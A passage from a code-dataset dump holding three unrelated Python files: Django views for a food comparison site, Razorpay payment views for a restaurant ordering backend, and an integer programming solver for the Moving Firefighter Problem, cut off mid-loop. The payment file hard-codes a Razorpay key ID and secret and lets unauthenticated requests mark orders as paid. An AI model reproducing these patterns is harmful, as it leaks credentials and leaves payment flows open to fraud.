search_query:\n food = models.Food.objects.filter(name__iregex=search_query)\n context['food'] = food\n else:\n food = models.Food.objects.all()\n context['food'] = food\n\n return render(request, \"food_list.html\", context)\n\n\ndef food_item_page(request):\n \"\"\"\n Отображение страницы с элементом базы данных Food\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n\n food_id = request.GET['id']\n food = models.Food.objects.get(id=food_id)\n vitamins = models.Food.get_vitamins_by_food(food)\n if 'id' in request.GET:\n context = {\n 'food': food,\n 'vitamins': vitamins,\n 'video_links': get_youtube_links(food_name=food.name)\n }\n else:\n context = {\n 'food': 'Ошибка',\n }\n\n if request.POST.get('like'):\n models.Like.objects.update_or_create(\n fruit=food,\n author=request.user\n )\n messages.success(request, \"Вы лайкнули фрукт\")\n if request.POST.get('delete_like'):\n try:\n models.Like.objects.get(\n fruit=food,\n author=request.user\n ).delete()\n messages.info(request, \"Лайк удалён\")\n except:\n pass\n if request.POST.get('add_to_comprasion'):\n models.Comprasion.objects.update_or_create(\n fruit=food,\n author=request.user\n )\n messages.success(request, \"Добавлено к сравнению\")\n if request.POST.get('delete_from_comprasion'):\n try:\n models.Comprasion.objects.get(\n fruit=food,\n author=request.user\n ).delete()\n messages.info(request, \"Удалено из сравнения\")\n except:\n pass\n\n return render(request, \"food_item.html\", context)\n\n@login_required\ndef profile_page(request):\n \"\"\"\n Отображение страницы профиля\n\n :param request: объект с деталями запроса\n :type request: :class:`django.http.HttpRequest`\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:`django.http.HttpResponse`\n \"\"\"\n context = {}\n liked = models.Like.objects.filter(author=request.user)\n try:\n context['liked'] = [liked[len(liked) - 3], liked[len(liked) - 2], liked[len(liked) - 1]]\n except:\n context['liked'] = liked\n return render(request, 'profile/page.html', context)\n\n@login_required\ndef like_page(request):\n \"\"\"\n Отображение страницы с понравившейся едой и расписанием приема пищи\n\n :param request: объект с деталями запроса\n :type request: :class:`django.http.HttpRequest`\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:`django.http.HttpResponse`\n \"\"\"\n context = {}\n liked = models.Like.get_by_user(request.user)\n context['liked'] = liked\n\n if 'breakfast' in request.POST:\n food_id = request.POST['breakfast']\n food = models.Food.objects.get(id=food_id)\n models.Breakfast.objects.update_or_create(\n breakfast=food,\n author=request.user\n )\n breakfast_food = models.Breakfast.objects.all()\n context['breakfast_food'] = breakfast_food\n\n if 'lunch' in request.POST:\n food_id = request.POST['lunch']\n food = models.Food.objects.get(id=food_id)\n models.Lunch.objects.update_or_create(\n lunch=food,\n author=request.user\n )\n lunch_food = models.Lunch.objects.all()\n context['lunch_food'] = lunch_food\n\n if 'dinner' in request.POST:\n food_id = request.POST['dinner']\n food = models.Food.objects.get(id=food_id)\n models.Dinner.objects.update_or_create(\n dinner=food,\n author=request.user\n )\n dinner_food = models.Dinner.objects.all()\n context['dinner_food'] = dinner_food\n\n try:\n food_id = request.POST['breakfast_delete']\n food = models.Food.objects.get(id=food_id)\n models.Breakfast.objects.get(\n breakfast=food,\n author=request.user\n ).delete()\n except:\n pass\n\n try:\n food_id = request.POST['lunch_delete']\n food = models.Food.objects.get(id=food_id)\n models.Lunch.objects.get(\n lunch=food,\n author=request.user\n ).delete()\n except:\n pass\n\n try:\n food_id = request.POST['dinner_delete']\n food = models.Food.objects.get(id=food_id)\n models.Dinner.objects.get(\n dinner=food,\n author=request.user\n ).delete()\n except:\n pass\n\n return render(request, 'like_page.html', context)\n\n\ndef statistics(request):\n \"\"\"\n Отображение страницы с едой отфильтрованной по её рейтингу\n (в том числе и еда, не имеющая рейтинга)\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n\n context = {}\n rating_dict = {}\n rating_list = list()\n\n rating = models.Like.objects.all()\n food = models.Food.objects.all()\n\n for item in rating:\n if item.fruit in rating_dict.keys():\n rating_dict[item.fruit] += 1\n else:\n rating_dict[item.fruit] = 1\n\n for item in food:\n if item not in rating_dict.keys():\n rating_dict[item] = 0\n\n for item in rating_dict:\n rating_list.append([item, rating_dict[item]])\n\n context = {\n 'list': sorted(rating_list, key=operator.itemgetter(1))[::-1]\n }\n\n return render(request, 'food_statistics.html', context)\n\n\ndef get_youtube_links(*, food_name):\n \"\"\"\n Функция получения ссылок на видео с ютуба о определенной еде\n\n :param food_name: название еды, по которой будет производится поиск\n :type food_name: str\n :return: cписок, в котором находится 3 ссылки\n :rtype: str\n \"\"\"\n try:\n with open('youtube_api_key.json', 'r') as data:\n API_KEY = json.load(data)['api_key']\n\n youtube = build(\"youtube\", \"v3\", developerKey=API_KEY)\n\n search_response = youtube.search().list(\n q=f\"факты о {food_name}\",\n type=\"video\",\n part=\"id,snippet\",\n maxResults=3,\n relevanceLanguage='ru',\n safeSearch='moderate',\n videoDefinition='high',\n videoEmbeddable='true',\n ).execute()\n\n video_urls = []\n for search_result in search_response.get(\"items\", []):\n if search_result[\"id\"][\"kind\"] == \"youtube#video\":\n video_urls.append(f\"https://www.youtube.com/embed/{search_result['id']['videoId']}\")\n\n return video_urls\n except Exception as error:\n print(repr(error))\n return None\n\n@login_required\ndef complaint_add(request):\n \"\"\"\n Отображение страницы подачи жалоб\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n context = {\n \"id\": request.GET.get(\"id\", 0)\n }\n\n return render(request, \"complaint_add.html\", context)\n\n@login_required\ndef complaint_list(request):\n \"\"\"\n Отображение страницы со всеми жалобами\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n context = {}\n if request.method == 'POST':\n fruit = models.Food.objects.filter(id=request.POST.get('id'))[0]\n author = request.user\n complaint = request.POST.get('btnradio')\n models.Complaint.add(author, complaint, fruit)\n\n all_complaints = models.Complaint.get_all()\n context['all_complaints'] = all_complaints\n\n return render(request, \"complaint_list.html\", context)\n\n@login_required\ndef add_comprasion(request):\n \"\"\"\n Обработка AJAX запроса по добавлению еды в таблицу для сравнения\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n\n fruit = request.GET.get('id')\n if not (models.Comprasion.get_by_user(request.user).__contains__(models.Food.objects.get(id=fruit))) \\\n and len(models.Comprasion.get_by_user(request.user)) < 4:\n models.Comprasion.add(models.Food.objects.get(id=fruit), author=request.user)\n\n context = {\n 'data': fruit\n }\n return JsonResponse(context)\n\n@login_required\ndef comprasion_page(request):\n \"\"\"\n Отображение страницы сравнения еды\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n context = {}\n context['food'] = models.Comprasion.get_by_user(request.user)\n context['vitamins'] = []\n for i in context['food']:\n context['vitamins'].append(models.Food.get_vitamins_by_food(i))\n\n context['count_food'] = len(context['food'])\n\n context['zip'] = zip(context['food'], context['vitamins'])\n\n if request.POST.get('clear_comprasion'):\n comprasion_list = models.Comprasion.get_by_user(request.user)\n for food in comprasion_list:\n models.Comprasion.objects.get(fruit=food, author=request.user).delete()\n\n return redirect(\"/comprasion/page/\")\n\n return render(request, \"comprasion_page.html\", context)\n\n\n@login_required\ndef delete_user(request):\n \"\"\"\n Обработка и отображение удаления профиля\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n user = request.user\n user.delete()\n return render(request, 'profile/page_deleted.html')\n\n\ndef comments_page(request):\n \"\"\"\n Отображение страницы добавления отзыва о сервисе\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: объект ответа сервера с HTML-кодом внутри\n :rtype: :class:django.http.HttpResponse\n \"\"\"\n context = {}\n if request.method == \"POST\":\n context['form'] = commentinputforme()\n f = commentinputforme(request.POST)\n if f.is_valid():\n obj = models.Comment(author=request.user, text=f.data['text'])\n obj.save()\n else:\n context['form'] = commentinputforme()\n comentdata = models.Comment.objects.all()\n context['comments'] = comentdata\n return render(request, 'comments.html', context)\n\n@login_required\ndef add_like(request):\n \"\"\"\n Обработка AJAX запроса, который добавляет лайк определенному объекту еды\n\n :param request: объект с деталями запроса\n :type request: :class:django.http.HttpRequest\n :return: HTTP response that consumes data to be serialized to JSON\n :rtype: :class:`django.http.HttpResponse`\n \"\"\"\n context = {\n 'data': 'ok'\n }\n try:\n likes = models.Like.objects.filter(\n author=request.user,\n fruit=models.Food.objects.filter(id=request.GET.get('id'))[0]\n )[0]\n except Exception as error:\n context = {\n 'data': str(repr(error))\n }\n like = models.Like.objects.create(\n fruit=models.Food.objects.filter(id=request.GET.get('id'))[0],\n author=request.user\n ).save()\n\n return JsonResponse(context)\n","repo_name":"Krahjotdaan/FoodComparison-MSHP","sub_path":"App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15954,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74067664553","text":"from api.payment.models import Payment\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\nimport razorpay\nfrom api.order.models import Order\nfrom rest_framework.permissions import AllowAny\nfrom api.customer.models import Customer\nfrom api.table.models import Table\nfrom api.order.models import Order\n\n# Create your views here.\n\nKEY_ID = \"rzp_test_U4xhl2f60ZY1nb\"\nKEY_SECRET = \"wkkx9LsU61tFcpAdlJ6IBBdJ\"\n\nclient = razorpay.Client(auth=(KEY_ID, KEY_SECRET))\n\n\n@api_view([\"POST\"])\n@permission_classes((AllowAny,))\ndef initiate_payment_process(request):\n\n try:\n order_id = request.data[\"order_id\"]\n phone_number = request.data[\"phone_number\"]\n except KeyError:\n return Response({\"detail\": \"No order id was provided.\"})\n\n try:\n order = Order.objects.get(id=order_id)\n total = order.get_total_after_gst()\n except Order.DoesNotExist:\n return Response({\"detail\": \"Invalid order id\"})\n\n order_amount = int(total * 100)\n order_currency = \"INR\"\n order_receipt = order_id\n notes = {\"phone_number\": phone_number}\n print(\"FLAG 1\")\n response = client.order.create(\n dict(\n amount=order_amount,\n currency=order_currency,\n receipt=order_receipt,\n notes=notes,\n payment_capture=\"0\",\n )\n )\n return Response({\"data\": response})\n\n\n@api_view([\"POST\"])\n@permission_classes((AllowAny,))\ndef payment_status(request):\n\n try:\n payment_detail = {\n \"razorpay_payment_id\": request.data[\"razorpay_payment_id\"],\n \"razorpay_order_id\": request.data[\"razorpay_order_id\"],\n \"razorpay_signature\": request.data[\"razorpay_signature\"],\n }\n amount = request.data[\"amount\"]\n customer = request.customer\n # print(payment_detail, \" \", amount)\n except KeyError:\n return Response({\"detail\": \"Something went wrong\"})\n\n try:\n status = client.utility.verify_payment_signature(payment_detail)\n client.payment.capture(\n payment_detail[\"razorpay_payment_id\"], amount, {\"currency\": \"INR\"},\n )\n # customer = Customer.objects.get(id=customer)\n customer.has_paid = True\n customer.is_on_table = False\n customer.token = 0\n table = Table.objects.get(customer=customer.id)\n table.is_occupied = False\n customer.save()\n table.save()\n payment = Payment.objects.create(\n transaction_id=payment_detail[\"razorpay_payment_id\"],\n customer=customer,\n amount=float(amount) / 100,\n )\n order = Order.objects.filter(customer=request.customer, ordered=False)\n order.update(payment=payment, ordered=True)\n return Response({\"detail\": \"ok\"})\n except Order.DoesNotExist:\n return Response({\"error\": \"Error in payment\"})\n\n\n@api_view([\"POST\"])\n@permission_classes((AllowAny,))\ndef payment_cash_card_status(request):\n\n try:\n amount = request.data[\"amount\"]\n invoice_no = request.data[\"invoice_no\"]\n customer = request.customer\n # print(payment_detail, \" \", amount)\n except KeyError:\n return Response({\"detail\": \"Something went wrong\"})\n\n try:\n\n # customer = Customer.objects.get(id=customer)\n customer.has_paid = True\n customer.is_on_table = False\n customer.token = 0\n table = Table.objects.get(customer=customer.id)\n table.is_occupied = False\n customer.save()\n table.save()\n payment = Payment.objects.create(\n transaction_id=\"cash_\" + invoice_no, customer=customer, amount=amount,\n )\n order = Order.objects.filter(customer=request.customer, ordered=False)\n order.update(payment=payment, ordered=True)\n return Response({\"detail\": \"ok\"})\n except Order.DoesNotExist:\n return Response({\"error\": \"Error in payment\"})\n","repo_name":"hemik000/self-ordering-restaurant-backend","sub_path":"api/payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42538198454","text":"\"\"\"\nMoving Firefighter Problem on Trees\nInteger Linear Programming Solution\nAuthor: Mauro Alejandro Montenegro Meza\n\"\"\"\nimport time as tm\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\n\nimport networkx as nx\nimport numpy\nimport pulp as pl\nfrom gurobipy import *\n\nfrom utils.utils import GDN\nfrom utils.utils import generateInstance\nfrom utils.utils import tracing_mem\nfrom utils.utils import tracing_start\n\nBN = 10000 # Big Number for Restrictions\nimport numpy as np\n\n\nclass ILP_MFF():\n def __init__(self, mode, load, path, config):\n # Individual Variables\n self.n_variables = []\n self.n_restrictions = []\n\n # Variables to plot with average\n self.times = []\n self.total_times = []\n self.total_saved = []\n self.saved = []\n\n # Control Variables\n self.config = config\n self.mode = mode\n self.load = load\n if self.mode == 'batch':\n self.path = path\n else:\n self.w_path = os.walk(Path.cwd() / 'Instance')\n self.path = path + '/Instance'\n def solve(self):\n # Traverse and save Tree Node Sizes dirs\n size_dirs = []\n for d in next(os.walk((self.path))):\n size_dirs.append(d)\n size_dirs = sorted(size_dirs[1])\n for dir in size_dirs:\n instance_path = self.path / str(dir)\n # Traverse each instance\n inst_dirs = []\n for i in next(os.walk((instance_path))):\n inst_dirs.append(i)\n inst_dirs = sorted(inst_dirs[1])\n # Solve IQP problem for each instance\n for inst in inst_dirs:\n print(\"\\n\\nCompute solution for size: {n}, instance: {i}\".format(n=dir, i=inst))\n # Load Instance\n instance = generateInstance(self.load, instance_path, str(inst))\n T = instance[0]\n N = instance[1]\n starting_fire = instance[2]\n T_Ad_Sym = instance[3]\n\n # --- MODEL-------\n m = Model(\"ILP_FF\")\n m.Params.outputFlag = 1 # 0 - Off // 1 - On\n m.setParam(\"MIPGap\", self.config['experiment']['mip_gap'])\n m.setParam(\"Method\", self.config['experiment']['method'])\n m.setParam(\"Presolve\", self.config['experiment'][\n 'presolve']) # -1 - Automatic // 0 - Off // 1 - Conservative // 2 - Aggresive\n m.setParam(\"NodefileStart\", self.config['experiment']['nodefilestart'])\n m.setParam(\"Threads\", self.config['experiment']['threads'])\n\n # ---InitialPos_Node_Variables----\n # (X_phase0_node1), (X_phase0_node2), .... ,(X_phase0_nodeN)\n initial_vars = []\n for i in range(N):\n initial_vars.append(0)\n if i != starting_fire:\n initial_vars[i] = m.addVar(vtype=GRB.BINARY, name=\"x,%s\" % str(0) + \",\" + str(i))\n m.update()\n\n # ---InitialPos_Node_Variables----\n # (X_phase1_node0_node0), (X_phase1_node0_node1), .... ,(X_phase1_node0_nodeN),(X_phase1_node1_node0),...,(X_phase1_nodeN_nodeN)\n # (X_phase2_node0_node0), (X_phase2_node0_node1), ...., (X_phase2_node0_nodeN),(X_phase2_node1_node0),...,(X_phase2_nodeN_nodeN)\n vars = []\n for i in range(N - 1):\n temp_1 = []\n for j in range(N):\n temp_2 = []\n for k in range(N):\n temp_2.append(0)\n temp_1.append(temp_2)\n vars.append(temp_1)\n\n for phase in range(N - 1):\n for node_1 in range(N):\n for node_2 in range(N):\n if ((node_1 != starting_fire) and (node_2 != starting_fire)):\n #print(\"Adding (x,{i},{j},{k})\".format(i=phase+1,j=node_1,k=node_2))\n vars[phase][node_1][node_2] = m.addVar(vtype=GRB.BINARY,\n name=\"x,%s\" % str(phase + 1) + \",\" + str(node_1) + \",\" + str(node_2))\n m.update()\n #print(starting_fire)\n #print(vars)\n\n # -------- OBJECTIVE FUNCTION ----------\n Nodes = list(T.nodes)\n Nodes.remove(N)\n Nodes.sort()\n weights = np.zeros(N)\n i = 0\n\n for node in Nodes:\n weights[i] = len(nx.descendants(T, node)) + 1\n i += 1\n\n # Sum initial vars to objective\n objective = 0\n weights_transpose = np.array(weights).T\n objective += np.dot(weights_transpose, initial_vars)\n\n # Sum rest of variables\n for i in range(N - 1):\n for j in range(N):\n w_copy = weights_transpose.copy()\n w_copy[j] = 0\n objective += np.dot(w_copy, vars[i][j])\n m.setObjective(objective, GRB.MAXIMIZE)\n\n #print(objective)\n count_const = 0\n\n # ----------SUBJECT TO---------------------\n\n # Constraint 1\n # Initial position to first saved vertex is unique\n sum_initial_vars = 0\n for i in range(N):\n sum_initial_vars += initial_vars[i]\n count_const += 1\n m.addConstr(sum_initial_vars <= 1)\n\n # Constraint 2\n # Only one variable active for each phase\n sum_vars = 0\n for phase in range(N-1):\n sum_vars = 0\n for node_1 in range(N):\n for node_2 in range(N):\n sum_vars += vars[phase][node_1][node_2]\n count_const += 1\n m.addConstr(sum_vars <= 1)\n\n # Constraint 3\n # Valid first reachable vertex\n levels = nx.single_source_shortest_path_length(\n T, starting_fire\n )\n sorted_burning_times = numpy.zeros(N)\n\n # Sorted Burning time for each node (from 0 to N)\n for i in range(N):\n sorted_burning_times[i] = levels[i]\n\n # Constraint for initial Position\n initial_time_const = np.dot(T_Ad_Sym[N, 0:N], initial_vars)\n initial_time_const_ = np.dot(sorted_burning_times.T, initial_vars)\n count_const += 1\n m.addConstr(initial_time_const <= initial_time_const_, name=\"Init_time_Const\")\n\n # Constraint for next phases\n for phase in range(N - 1):\n q_1 = 0\n q_2 = 0\n for phase_range in range(0, phase + 1):\n for node_i in range(N):\n for node_j in range(N):\n q_1 += T_Ad_Sym[node_i][node_j] * vars[phase_range][node_i][node_j]\n q_1 += initial_time_const\n for i in range(N):\n q_2 += np.dot(sorted_burning_times.T, vars[phase][i])\n count_const += 1\n m.addConstr(q_1 <= q_2, name=\"Q,%s\" % str(phase))\n\n # Constraint 4\n # Leaf nodes\n leaf_nodes = [node for node in T.nodes() if T.in_degree(node) != 0 and T.out_degree(node) == 0]\n restricted_ancestors = {}\n for leaf in leaf_nodes:\n restricted_ancestors[leaf] = list(nx.ancestors(T, leaf))\n restricted_ancestors[leaf].remove(starting_fire)\n restricted_ancestors[leaf].insert(0, leaf)\n\n for leaf in restricted_ancestors:\n l_q = 0\n for node in restricted_ancestors[leaf]:\n for phase in range(N - 1):\n for input_node in range(N):\n if input_node!= node:\n l_q += vars[phase][input_node][node]\n l_q += initial_vars[node]\n count_const += 1\n m.addConstr(l_q <= 1)\n\n # Constraint 5\n # Consistency Restriction\n for i in range(N):\n l_q = 0\n l_q += initial_vars[i]\n for j in range(N):\n for k in range(N):\n if j != i:\n l_q += vars[0][j][k]\n count_const += 1\n m.addConstr(l_q <= 1)\n\n for i in range(N): # For each node v\n for j in range(N - 2): # For each phase\n l_q = 0\n for k in range(N): # For each node u\n l_q += vars[j][k][i]\n for z in range(N):\n for p in range(N):\n if z != i:\n l_q += vars[j + 1][z][p]\n count_const += 1\n m.addConstr(l_q <= 1)\n\n # Constraint 6\n # Consecutive solution constraint\n c_1 = 0\n c_2 = 0\n for i in range(N):\n c_1 += initial_vars[i]\n for j in range(N):\n for k in range(N):\n c_2 += vars[0][j][k]\n count_const += 1\n m.addConstr(c_1 >= c_2)\n\n for z in range(N-2):\n c_1=0\n c_2=0\n for i in range(N):\n for j in range(N):\n c_1 += vars[z][i][j]\n c_2 += vars[z+1][i][j]\n m.addConstr(c_1 >= c_2)\n\n #m.update()\n #print(m.display())\n # ----------------- Optimize Step--------------------------------\n m.optimize()\n runtime = m.Runtime\n self.saved.append(m.ObjVal)\n self.times.append(runtime)\n sol = []\n for v in m.getVars():\n if v.X > 0:\n sol.append(v)\n self.solution = sol\n\n # Save Solution\n self.saveSolution(instance_path, str(inst), sol, m.Objval, runtime)\n # Save\n self.total_saved.append(self.saved)\n self.total_times.append(self.times)\n # Reset\n self.saved = []\n self.times = []\n self.Statistics()\n\n def saveSolution(self, instance_path, instance, solution, saved, time):\n output_path = instance_path / instance / \"Solution_Summary_ILP\"\n with open(output_path, \"w\") as writer:\n writer.write(\"Solution: {}\\n\".format(solution))\n writer.write(\"Saved: {}\\n\".format(saved))\n writer.write(\"RunTime: {}\\n\".format(time))\n\n writer.write(\"G_mipgap: {}\\n\".format(self.config['experiment']['mip_gap']))\n writer.write(\"G_threads: {}\\n\".format(self.config['experiment']['threads']))\n writer.write(\"presolve: {}\\n\".format(self.config['experiment']['presolve']))\n writer.write(\"method: {}\\n\".format(self.config['experiment']['method']))\n\n def Statistics(self):\n time_mean = []\n time_std_dv=[]\n saved_mean = []\n saved_std_dv = []\n # Statistics for run time\n for node_size in self.total_times:\n m = np.mean(node_size)\n std = np.std(node_size)\n time_mean.append(m)\n time_std_dv.append(std)\n time_std_dv = np.asarray(time_std_dv)\n time_mean = np.asarray(time_mean)\n\n # Statistics for saved vertices\n for node_size in self.total_saved:\n m = np.mean(node_size)\n std = np.std(node_size)\n saved_mean.append(m)\n saved_std_dv.append(std)\n saved_std_dv=np.asarray(saved_std_dv)\n saved_mean=np.asarray(saved_mean)\n\n print(saved_mean)\n print(saved_std_dv)\n\n numpy.save(self.path / \"Statistics_ILP\", numpy.array([saved_mean, saved_std_dv, time_mean, time_std_dv]))\n y= np.arange(0,len(time_mean), 1, dtype=int)\n fig, ax = plt.subplots(1)\n ax.plot(y,saved_mean, label=\"Mean saved Vertices\",color=\"blue\")\n ax.set_title(\"ILP Mean Saved Vertices\")\n ax.set_xlabel('Tree Size')\n ax.set_ylabel('Saved Vertices')\n ax.fill_between(y, saved_mean-saved_std_dv,saved_mean+saved_std_dv,facecolor=\"blue\",alpha=0.5)\n plt.savefig(self.path / 'ILP_Saved.png')\n\n fig, ax = plt.subplots(1)\n ax.plot(y, time_mean, label=\"Mean Time Vertices\", color=\"red\")\n ax.set_title(\"ILP Mean Runtime\")\n ax.set_xlabel('Tree Size')\n ax.set_ylabel('Runtime (s)')\n ax.fill_between(y, time_mean - time_std_dv, time_mean + time_std_dv, facecolor=\"red\", alpha=0.5)\n plt.savefig(self.path / 'ILP_Time.png')\n\n\n def solve_pulp(self):\n for root, directories, files in self.w_path:\n directories.sort()\n for directory in directories:\n print(\"\\n\\nCompute solution for {n}\".format(n=directory))\n instance = generateInstance(self.load, self.path, str(directory))\n T = instance[0]\n N = instance[1]\n starting_fire = instance[2]\n T_Ad_Sym = instance[3]\n seed = instance[4]\n scale = instance[5]\n a_x_pos = instance[6]\n a_y_pos = instance[7]\n self.max_degree.append(instance[8])\n self.root_degree.append(instance[9])\n\n # Check and change LP Solver\n #solver_list = pl.listSolvers(onlyAvailable=True)\n #print(solver_list)\n # Build Node Structure for LP\n Nodes = list(T.nodes)\n Nodes.remove(starting_fire)\n Nodes.remove(N)\n\n # Pre-Compute Data\n ###########################################################################################################\n # Pre-Compute Burning_Times for each node in T\n levels = nx.single_source_shortest_path_length(\n T, starting_fire\n ) # Obtain Level in Tree for each node\n ############################################################################################################\n\n # Create LP Problem\n prob = pl.LpProblem(\"Moving_Firefighter_Tree\", pl.LpMaximize)\n\n # Create Decision Variables: (X_k,u,v)\n # Create all edges (without initial position)\n all_edges = []\n for node1 in Nodes:\n for node2 in Nodes:\n # if node1 != node2:\n edge = [node1, node2]\n all_edges.append(edge)\n edge_number = len(all_edges)\n\n # Create all edges for initial position\n all_initial_edges = []\n for node1 in Nodes:\n edge = [N, node1]\n all_initial_edges.append(edge)\n\n # Create all phases for all edges without initial pos\n variables = []\n # Array Containing all edges per phase\n phases = [x for x in range(1, N + 1)] # Array of total phases (Max node number)\n\n for phase in phases:\n edges_per_phase = {}\n for edge in all_edges: # Here, we fill all edges in this phase\n x = edge.copy()\n x.append(phase)\n if edge[0] == edge[1]:\n edges_per_phase[str(x)] = \"f\"\n else:\n edges_per_phase[str(x)] = edge[1]\n variables.append(edges_per_phase)\n\n # Pre-Compute cardinality of a node sub-tree (saved nodes if defended)\n weights = {}\n for node in Nodes:\n weights[node] = len(nx.descendants(T, node)) + 1\n weights[\"f\"] = 0\n\n items_per_phase = []\n for phase in phases:\n items_per_phase.append(variables[phase - 1].keys())\n\n # Create initial phase for all edges\n variables_init = {}\n for node in Nodes:\n x = [N, node]\n x.append(0)\n variables_init[str(x)] = node\n items_init = variables_init.keys()\n\n # Create Initial Decision Variables for LP with restrictions in range and type\n lpvariables_init = pl.LpVariable.dicts(\"Defend\", items_init, 0, 1, pl.LpBinary)\n\n # Create Decision Variables for LP with restrictions in range and type for each phase\n lpvariables_per_phase = []\n for phase in phases:\n lpvariables = pl.LpVariable.dicts(\"Defend\", items_per_phase[phase - 1], 0, 1, pl.LpBinary)\n lpvariables_per_phase.append(lpvariables)\n\n self.n_variables.append((N-1)+(N-1)*(N-1)*N)\n\n # Sum Decision Variables\n lps = 0\n counter = 0\n\n lps_init = pl.lpSum(\n [lpvariables_init[f] * weights[variables_init[f]] for f in variables_init]\n )\n\n for phase in lpvariables_per_phase:\n lps += pl.lpSum(\n [phase[i] * weights[variables[counter][i]] for i in variables[counter]]\n )\n counter += 1\n\n lps_total = lps + lps_init\n\n # Construct optimization problem\n prob += (\n lps_total,\n \"Sum_of_Defended_Edges\",\n )\n\n count_const = 0\n # Constraints\n #################################################################################################################\n # 1) At phase 0, we only enable at most one edge to be active from p_0 to any node v\n\n first_constraint = pl.lpSum([lpvariables_init[i] for i in variables_init])\n count_const += 1\n prob += (\n first_constraint == 1,\n \"Initial_Edges\",\n )\n\n # 2) From phase 1 to N we only enable at most one edge to be active per phase\n counter = 0\n for lpvariables_ in lpvariables_per_phase:\n cons = pl.lpSum([lpvariables_[i] for i in variables[counter]])\n count_const += 1\n prob += (\n cons == 1,\n \"Edges_Phase_%s\" % counter,\n )\n counter += 1\n\n # 3) At phase 0, we only enable edge transitions that lead B from his initial position p_0\n # to nodes which B can reach before fire does.\n cons_i = pl.lpSum(\n [\n lpvariables_init[i] * T_Ad_Sym[int(GDN(i)[0])][int(GDN(i)[1])]\n for i in variables_init\n ]\n )\n cons_d = pl.lpSum([lpvariables_init[i] * levels[int(GDN(i)[1])] for i in variables_init])\n\n count_const += 1\n prob += (\n cons_i <= cons_d,\n \"Initial_Distance_Restriction\",\n )\n\n # 4) From phase 1 to n we enable only edges that lead B to valid nodes from his current position. The sum of distances\n # from p0 to current position following active edges must be less that the time it takes the fire to reach a node from\n # the nearest fire root.\n # r_init= lpSum([lpvariables_init[i] * T_Ad_Sym[int(GDN(i)[0])][int(GDN(i)[1])] for i in variables_init])\n counter = 0\n dist_r_i = cons_i\n dist_r_d = 0\n\n for (\n lpvariables_\n ) in lpvariables_per_phase: # At each loop sum one new phase (Cumulative)\n dist_r_i += pl.lpSum(\n [\n lpvariables_[i] * T_Ad_Sym[int(GDN(i)[0])][int(GDN(i)[1])]\n for i in variables[counter]\n ]\n )\n dist_r_d = pl.lpSum(\n [lpvariables_[i] * levels[int(GDN(i)[1])] for i in variables[counter]]\n )\n disable_r = BN * (1 - pl.lpSum([lpvariables_[i] for i in variables[counter]]))\n dist_r_d += disable_r\n count_const += 1\n prob += (\n dist_r_i <= dist_r_d,\n \"Distance_Restriction_%s\" % counter,\n )\n counter += 1\n\n # 5) We only enable one defended node in the path of each leaf to the root\n leaf_nodes = [\n node for node in T.nodes() if T.in_degree(node) != 0 and T.out_degree(node) == 0\n ]\n restricted_ancestors = {}\n for leaf in leaf_nodes:\n restricted_ancestors[leaf] = list(nx.ancestors(T, leaf))\n restricted_ancestors[leaf].remove(starting_fire)\n restricted_ancestors[leaf].insert(0, leaf)\n\n p0 = str(N)\n\n for leaf in restricted_ancestors:\n #print(restricted_ancestors[leaf])\n r = 0\n for node in restricted_ancestors[leaf]:\n # Generate only edges that goes to 'node'\n valid_nodes = Nodes.copy()\n valid_nodes.remove(node)\n valid_edges = [[int(i), int(node)] for i in valid_nodes]\n l = str(node)\n key_init_string = \"[\" + p0 + \", \" + l + \", \" + \"0]\"\n r += lpvariables_init[key_init_string]\n counter = 0\n for lpvariables_ in lpvariables_per_phase:\n valid_edges_tmp = valid_edges.copy()\n for edge in valid_edges_tmp:\n if len(edge) > 2:\n edge.pop(2)\n edge = edge.insert(2, counter + 1)\n valid_edges_keys = [str(element) for element in valid_edges_tmp]\n lpv_edges_phase = pl.lpSum(lpvariables_[i] for i in valid_edges_keys)\n r += lpv_edges_phase\n counter += 1\n #print(r)\n count_const += 1\n prob += (\n r <= 1,\n \"Leaf_Restriction_{l},{n}\".format(l=leaf, n=node),\n )\n\n # 6) If we choose an edge at phase K, next phase must include the last node in the edge, others will\n # be invalid edges.\n\n for element in variables_init:\n initial_pos_var = lpvariables_init[element]\n valid_input_edge = GDN(element)[1]\n sum = initial_pos_var\n keys = []\n for element_ in lpvariables_per_phase[0]: # Phase K+1 = 1\n valid_input_edge_ = GDN(element_)[0]\n if int(valid_input_edge) != int(\n valid_input_edge_\n ): # Restriction over other nodes\n keys.append(element_)\n sum += pl.lpSum(lpvariables_per_phase[0][i] for i in keys)\n count_const += 1\n prob += (\n sum <= 1,\n \"Initial_Continuity_Restriction_{l}\".format(l=element),\n )\n\n rest = 1\n # Now for next consecutive phases\n for node in Nodes:\n # print(\"Analyzing Node {n}\".format(n=node))\n for phase in range(0, N - 1):\n sum = 0\n # print(\"Phase 